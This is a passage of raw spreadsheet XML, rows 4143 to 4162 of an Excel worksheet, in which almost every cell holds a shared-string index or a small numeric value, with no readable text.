      <c r="W4143" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4143" s="12">
        <v>3</v>
      </c>
      <c r="Y4143" s="12" t="s">
        <v>26627</v>
      </c>
    </row>
    <row r="4144" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4144" s="12">
        <v>58931</v>
      </c>
      <c r="B4144" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4144" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4144" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F4144" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4144" s="12" t="s">
        <v>26633</v>
      </c>
      <c r="H4144" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4144" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J4144" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K4144" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4144" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4144" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4144" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4144" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4144" s="12" t="s">
        <v>26629</v>
      </c>
      <c r="Q4144" s="16">
        <v>3.1</v>
      </c>
      <c r="R4144" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4144" s="12" t="s">
        <v>26634</v>
      </c>
      <c r="T4144" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U4144" s="12" t="s">
        <v>26635</v>
      </c>
      <c r="V4144" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W4144" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4144" s="12">
        <v>2</v>
      </c>
      <c r="Y4144" s="12" t="s">
        <v>26636</v>
      </c>
    </row>
    <row r="4145" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4145" s="12">
        <v>58941</v>
      </c>
      <c r="B4145" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4145" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4145" s="12" t="s">
        <v>31451</v>
      </c>
      <c r="F4145" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4145" s="12" t="s">
        <v>26637</v>
      </c>
      <c r="H4145" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4145" s="12" t="s">
        <v>14196</v>
      </c>
      <c r="J4145" s="12" t="s">
        <v>14197</v>
      </c>
      <c r="K4145" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4145" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4145" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4145" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4145" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4145" s="12" t="s">
        <v>26629</v>
      </c>
      <c r="Q4145" s="16">
        <v>3.1</v>
      </c>
      <c r="R4145" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4145" s="12" t="s">
        <v>26638</v>
      </c>
      <c r="T4145" s="12" t="s">
        <v>25485</v>
      </c>
      <c r="U4145" s="12" t="s">
        <v>26631</v>
      </c>
      <c r="V4145" s="12" t="s">
        <v>14432</v>
      </c>
      <c r="W4145" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4145" s="12">
        <v>2</v>
      </c>
      <c r="Y4145" s="12" t="s">
        <v>26639</v>
      </c>
    </row>
    <row r="4146" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4146" s="12">
        <v>59201</v>
      </c>
      <c r="B4146" s="12" t="s">
        <v>31151</v>
      </c>
      <c r="C4146" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4146" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4146" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4146" s="12" t="s">
        <v>31161</v>
      </c>
      <c r="G4146" s="12" t="s">
        <v>26644</v>
      </c>
      <c r="H4146" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4146" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4146" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4146" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4146" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4146" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4146" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4146" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4146" s="12" t="s">
        <v>26645</v>
      </c>
      <c r="Q4146" s="16">
        <v>3.1</v>
      </c>
      <c r="R4146" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4146" s="12" t="s">
        <v>26646</v>
      </c>
      <c r="T4146" s="12" t="s">
        <v>16353</v>
      </c>
      <c r="U4146" s="12" t="s">
        <v>26647</v>
      </c>
      <c r="V4146" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4146" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4146" s="12">
        <v>7</v>
      </c>
      <c r="Y4146" s="12" t="s">
        <v>26648</v>
      </c>
    </row>
    <row r="4147" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4147" s="12">
        <v>59271</v>
      </c>
      <c r="B4147" s="12" t="s">
        <v>30515</v>
      </c>
      <c r="C4147" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4147" s="12" t="s">
        <v>30524</v>
      </c>
      <c r="F4147" s="12" t="s">
        <v>30562</v>
      </c>
      <c r="G4147" s="12" t="s">
        <v>26649</v>
      </c>
      <c r="H4147" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4147" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4147" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4147" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4147" s="12" t="s">
        <v>4026</v>
      </c>
      <c r="M4147" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N4147" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O4147" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4147" s="12" t="s">
        <v>26650</v>
      </c>
      <c r="Q4147" s="12">
        <v>3.9</v>
      </c>
      <c r="R4147" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4147" s="12" t="s">
        <v>26651</v>
      </c>
      <c r="T4147" s="12" t="s">
        <v>26652</v>
      </c>
      <c r="U4147" s="12" t="s">
        <v>26653</v>
      </c>
      <c r="V4147" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4147" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4147" s="12">
        <v>13</v>
      </c>
      <c r="Y4147" s="12" t="s">
        <v>26654</v>
      </c>
    </row>
    <row r="4148" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4148" s="12">
        <v>59371</v>
      </c>
      <c r="B4148" s="12" t="s">
        <v>30416</v>
      </c>
      <c r="C4148" s="12" t="s">
        <v>30417</v>
      </c>
      <c r="D4148" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4148" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4148" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4148" s="12" t="s">
        <v>26655</v>
      </c>
      <c r="H4148" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4148" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4148" s="12" t="s">
        <v>21511</v>
      </c>
      <c r="K4148" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4148" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4148" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4148" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4148" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4148" s="12" t="s">
        <v>26656</v>
      </c>
      <c r="Q4148" s="16">
        <v>3.1</v>
      </c>
      <c r="R4148" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4148" s="12" t="s">
        <v>26657</v>
      </c>
      <c r="T4148" s="12" t="s">
        <v>26563</v>
      </c>
      <c r="U4148" s="12" t="s">
        <v>26564</v>
      </c>
      <c r="V4148" s="12" t="s">
        <v>26565</v>
      </c>
      <c r="W4148" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4148" s="12">
        <v>2</v>
      </c>
      <c r="Y4148" s="12" t="s">
        <v>26658</v>
      </c>
    </row>
    <row r="4149" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4149" s="12">
        <v>59441</v>
      </c>
      <c r="B4149" s="12" t="s">
        <v>29910</v>
      </c>
      <c r="D4149" s="12" t="s">
        <v>29938</v>
      </c>
      <c r="E4149" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4149" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4149" s="12" t="s">
        <v>26659</v>
      </c>
      <c r="H4149" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4149" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4149" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4149" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4149" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4149" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4149" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4149" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4149" s="12" t="s">
        <v>26660</v>
      </c>
      <c r="Q4149" s="12">
        <v>3.9</v>
      </c>
      <c r="R4149" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4149" s="12" t="s">
        <v>26661</v>
      </c>
      <c r="T4149" s="12" t="s">
        <v>26662</v>
      </c>
      <c r="U4149" s="12" t="s">
        <v>26620</v>
      </c>
      <c r="V4149" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4149" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4149" s="12">
        <v>9</v>
      </c>
      <c r="Y4149" s="12" t="s">
        <v>26663</v>
      </c>
    </row>
    <row r="4150" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4150" s="12">
        <v>59491</v>
      </c>
      <c r="B4150" s="12" t="s">
        <v>30187</v>
      </c>
      <c r="D4150" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4150" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4150" s="12" t="s">
        <v>26670</v>
      </c>
      <c r="H4150" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4150" s="12" t="s">
        <v>27</v>
      </c>
      <c r="J4150" s="12" t="s">
        <v>1437</v>
      </c>
      <c r="K4150" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4150" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4150" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4150" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4150" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4150" s="12" t="s">
        <v>26671</v>
      </c>
      <c r="Q4150" s="12">
        <v>3.9</v>
      </c>
      <c r="R4150" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4150" s="12" t="s">
        <v>26672</v>
      </c>
      <c r="T4150" s="12" t="s">
        <v>18753</v>
      </c>
      <c r="U4150" s="12" t="s">
        <v>26673</v>
      </c>
      <c r="V4150" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W4150" s="12">
        <v>60001</v>
      </c>
      <c r="X4150" s="12">
        <v>13</v>
      </c>
      <c r="Y4150" s="12" t="s">
        <v>26674</v>
      </c>
    </row>
    <row r="4151" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4151" s="12">
        <v>59501</v>
      </c>
      <c r="B4151" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4151" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4151" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4151" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4151" s="12" t="s">
        <v>26675</v>
      </c>
      <c r="H4151" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4151" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4151" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K4151" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4151" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4151" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4151" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4151" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4151" s="12" t="s">
        <v>26676</v>
      </c>
      <c r="Q4151" s="16">
        <v>3.1</v>
      </c>
      <c r="R4151" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4151" s="12" t="s">
        <v>26677</v>
      </c>
      <c r="T4151" s="12" t="s">
        <v>26438</v>
      </c>
      <c r="U4151" s="12" t="s">
        <v>26678</v>
      </c>
      <c r="V4151" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4151" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4151" s="12">
        <v>40</v>
      </c>
      <c r="Y4151" s="12" t="s">
        <v>26679</v>
      </c>
    </row>
    <row r="4152" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4152" s="12">
        <v>59691</v>
      </c>
      <c r="B4152" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D4152" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4152" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4152" s="12" t="s">
        <v>26680</v>
      </c>
      <c r="H4152" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4152" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4152" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4152" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4152" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M4152" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N4152" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O4152" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4152" s="12" t="s">
        <v>26681</v>
      </c>
      <c r="Q4152" s="16">
        <v>3.1</v>
      </c>
      <c r="R4152" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4152" s="12" t="s">
        <v>26682</v>
      </c>
      <c r="T4152" s="12" t="s">
        <v>26683</v>
      </c>
      <c r="U4152" s="12" t="s">
        <v>26684</v>
      </c>
      <c r="V4152" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4152" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4152" s="12">
        <v>6</v>
      </c>
      <c r="Y4152" s="12" t="s">
        <v>26685</v>
      </c>
    </row>
    <row r="4153" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4153" s="12">
        <v>59781</v>
      </c>
      <c r="B4153" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4153" s="12" t="s">
        <v>30590</v>
      </c>
      <c r="E4153" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4153" s="12" t="s">
        <v>30589</v>
      </c>
      <c r="G4153" s="12" t="s">
        <v>26686</v>
      </c>
      <c r="H4153" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4153" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4153" s="12" t="s">
        <v>3174</v>
      </c>
      <c r="K4153" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4153" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4153" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4153" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4153" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4153" s="12" t="s">
        <v>26687</v>
      </c>
      <c r="Q4153" s="16">
        <v>3.1</v>
      </c>
      <c r="R4153" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4153" s="12" t="s">
        <v>26688</v>
      </c>
      <c r="T4153" s="12" t="s">
        <v>26689</v>
      </c>
      <c r="U4153" s="12" t="s">
        <v>26690</v>
      </c>
      <c r="V4153" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4153" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4153" s="12">
        <v>26</v>
      </c>
      <c r="Y4153" s="12" t="s">
        <v>26691</v>
      </c>
    </row>
    <row r="4154" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4154" s="12">
        <v>59831</v>
      </c>
      <c r="B4154" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4154" s="12" t="s">
        <v>30359</v>
      </c>
      <c r="F4154" s="12" t="s">
        <v>30359</v>
      </c>
      <c r="G4154" s="12" t="s">
        <v>26692</v>
      </c>
      <c r="H4154" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4154" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4154" s="12" t="s">
        <v>21511</v>
      </c>
      <c r="K4154" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4154" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4154" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4154" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4154" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4154" s="12" t="s">
        <v>26693</v>
      </c>
      <c r="Q4154" s="16">
        <v>3.1</v>
      </c>
      <c r="R4154" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4154" s="12" t="s">
        <v>26694</v>
      </c>
      <c r="T4154" s="12" t="s">
        <v>26563</v>
      </c>
      <c r="U4154" s="12" t="s">
        <v>26695</v>
      </c>
      <c r="V4154" s="12" t="s">
        <v>26565</v>
      </c>
      <c r="W4154" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4154" s="12">
        <v>1</v>
      </c>
      <c r="Y4154" s="12" t="s">
        <v>26696</v>
      </c>
    </row>
    <row r="4155" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4155" s="12">
        <v>59871</v>
      </c>
      <c r="B4155" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4155" s="12" t="s">
        <v>30906</v>
      </c>
      <c r="E4155" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4155" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4155" s="12" t="s">
        <v>26697</v>
      </c>
      <c r="H4155" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4155" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4155" s="12" t="s">
        <v>2586</v>
      </c>
      <c r="K4155" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4155" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4155" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4155" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4155" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4155" s="12" t="s">
        <v>26698</v>
      </c>
      <c r="Q4155" s="16">
        <v>3.1</v>
      </c>
      <c r="R4155" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4155" s="12" t="s">
        <v>26699</v>
      </c>
      <c r="T4155" s="12" t="s">
        <v>26700</v>
      </c>
      <c r="U4155" s="12" t="s">
        <v>26701</v>
      </c>
      <c r="V4155" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4155" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4155" s="12">
        <v>17</v>
      </c>
      <c r="Y4155" s="12" t="s">
        <v>26702</v>
      </c>
    </row>
    <row r="4156" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4156" s="12">
        <v>59921</v>
      </c>
      <c r="B4156" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4156" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D4156" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4156" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4156" s="12" t="s">
        <v>26703</v>
      </c>
      <c r="H4156" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4156" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4156" s="12" t="s">
        <v>21511</v>
      </c>
      <c r="K4156" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4156" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4156" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4156" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4156" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4156" s="12" t="s">
        <v>26704</v>
      </c>
      <c r="Q4156" s="12">
        <v>3.9</v>
      </c>
      <c r="R4156" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4156" s="12" t="s">
        <v>26705</v>
      </c>
      <c r="T4156" s="12" t="s">
        <v>26563</v>
      </c>
      <c r="U4156" s="12" t="s">
        <v>26706</v>
      </c>
      <c r="V4156" s="12" t="s">
        <v>26565</v>
      </c>
      <c r="W4156" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4156" s="12">
        <v>6</v>
      </c>
      <c r="Y4156" s="12" t="s">
        <v>26707</v>
      </c>
    </row>
    <row r="4157" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4157" s="12">
        <v>59991</v>
      </c>
      <c r="B4157" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4157" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4157" s="12" t="s">
        <v>31453</v>
      </c>
      <c r="F4157" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4157" s="12" t="s">
        <v>26708</v>
      </c>
      <c r="H4157" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4157" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4157" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4157" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4157" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4157" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4157" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4157" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4157" s="12">
        <v>3.9</v>
      </c>
      <c r="Q4157" s="12">
        <v>3.9</v>
      </c>
      <c r="R4157" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4157" s="12" t="s">
        <v>26709</v>
      </c>
      <c r="T4157" s="12" t="s">
        <v>26710</v>
      </c>
      <c r="U4157" s="12" t="s">
        <v>26711</v>
      </c>
      <c r="V4157" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4157" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4157" s="12">
        <v>4</v>
      </c>
    </row>
    <row r="4158" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4158" s="12">
        <v>60061</v>
      </c>
      <c r="B4158" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4158" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4158" s="12" t="s">
        <v>31431</v>
      </c>
      <c r="F4158" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4158" s="12" t="s">
        <v>26712</v>
      </c>
      <c r="H4158" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4158" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J4158" s="12" t="s">
        <v>1299</v>
      </c>
      <c r="K4158" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4158" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4158" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4158" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4158" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4158" s="12">
        <v>3.9</v>
      </c>
      <c r="Q4158" s="12">
        <v>3.9</v>
      </c>
      <c r="R4158" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4158" s="12" t="s">
        <v>26713</v>
      </c>
      <c r="T4158" s="12" t="s">
        <v>26714</v>
      </c>
      <c r="U4158" s="12" t="s">
        <v>26715</v>
      </c>
      <c r="V4158" s="12" t="s">
        <v>10314</v>
      </c>
      <c r="W4158" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4158" s="12">
        <v>2</v>
      </c>
    </row>
    <row r="4159" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4159" s="12">
        <v>60121</v>
      </c>
      <c r="B4159" s="12" t="s">
        <v>30604</v>
      </c>
      <c r="C4159" s="12" t="s">
        <v>30600</v>
      </c>
      <c r="D4159" s="12" t="s">
        <v>30605</v>
      </c>
      <c r="F4159" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4159" s="12" t="s">
        <v>26716</v>
      </c>
      <c r="H4159" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4159" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4159" s="12" t="s">
        <v>12555</v>
      </c>
      <c r="K4159" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4159" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4159" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4159" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4159" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4159" s="12" t="s">
        <v>26717</v>
      </c>
      <c r="Q4159" s="16">
        <v>3.1</v>
      </c>
      <c r="R4159" s="12" t="e">
        <v>#NAME?</v>
      </c>
      <c r="S4159" s="12" t="s">
        <v>26718</v>
      </c>
      <c r="T4159" s="12" t="s">
        <v>22810</v>
      </c>
      <c r="U4159" s="12" t="s">
        <v>26715</v>
      </c>
      <c r="V4159" s="12" t="s">
        <v>13296</v>
      </c>
      <c r="W4159" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4159" s="12">
        <v>1</v>
      </c>
      <c r="Y4159" s="12" t="s">
        <v>26719</v>
      </c>
    </row>
    <row r="4160" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4160" s="12">
        <v>60161</v>
      </c>
      <c r="B4160" s="12" t="s">
        <v>31304</v>
      </c>
      <c r="D4160" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4160" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4160" s="12" t="s">
        <v>26720</v>
      </c>
      <c r="H4160" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4160" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4160" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4160" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4160" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4160" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4160" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4160" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4160" s="12" t="s">
        <v>26721</v>
      </c>
      <c r="Q4160" s="12">
        <v>3.9</v>
      </c>
      <c r="R4160" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4160" s="12" t="s">
        <v>26722</v>
      </c>
      <c r="T4160" s="12" t="s">
        <v>26723</v>
      </c>
      <c r="U4160" s="12" t="s">
        <v>26724</v>
      </c>
      <c r="V4160" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4160" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4160" s="12">
        <v>20</v>
      </c>
      <c r="Y4160" s="12" t="s">
        <v>26725</v>
      </c>
    </row>
    <row r="4161" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4161" s="12">
        <v>60171</v>
      </c>
      <c r="B4161" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4161" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4161" s="12" t="s">
        <v>31453</v>
      </c>
      <c r="F4161" s="12" t="s">
        <v>31344</v>
      </c>
      <c r="G4161" s="12" t="s">
        <v>26726</v>
      </c>
      <c r="H4161" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4161" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4161" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K4161" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4161" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4161" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4161" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4161" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4161" s="12" t="s">
        <v>26727</v>
      </c>
      <c r="Q4161" s="12">
        <v>3.9</v>
      </c>
      <c r="R4161" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4161" s="12" t="s">
        <v>26728</v>
      </c>
      <c r="T4161" s="12" t="s">
        <v>26729</v>
      </c>
      <c r="U4161" s="12" t="s">
        <v>26730</v>
      </c>
      <c r="V4161" s="12" t="s">
        <v>10166</v>
      </c>
      <c r="W4161" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4161" s="12">
        <v>6</v>
      </c>
      <c r="Y4161" s="12" t="s">
        <v>26731</v>
      </c>
    </row>
    <row r="4162" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4162" s="12">
        <v>60291</v>
      </c>
      <c r="B4162" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4162" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4162" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4162" s="12" t="s">
